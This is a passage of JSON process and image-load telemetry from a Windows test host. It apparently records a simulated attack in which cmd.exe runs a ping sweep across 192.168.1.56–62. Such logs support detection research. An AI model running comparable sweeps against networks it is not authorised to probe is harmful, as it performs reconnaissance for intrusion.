"{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572246990000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "event_type": "process", - "pid": 3496, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572251830000, - "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.56", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4796, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - 
"timestamp": 131883572251980000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572251990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572252140000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "event_type": "process", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572256840000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.57", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572256990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "event_type": "process", - 
"pid": 5216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572261990000, - "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.58", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - 
"unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572262140000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "event_type": "process", - "pid": 3184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572266840000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.59", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4692, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572266990000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": 
"{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572266980000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883572268869984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", - "registry_value": "418A073AA3BC3475", - "timestamp": 131883572268869984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "process", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "subtype": "terminate", - "timestamp": 131883572268869984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "process", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": 
"C:\\Windows\\System32\\SearchFilterHost.exe", - "subtype": "terminate", - "timestamp": 131883572269020000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "process", - "pid": 4692, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572271990000, - "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.60", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", 
- "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "process", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572276830000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.61", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "process", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572281840000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.62", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
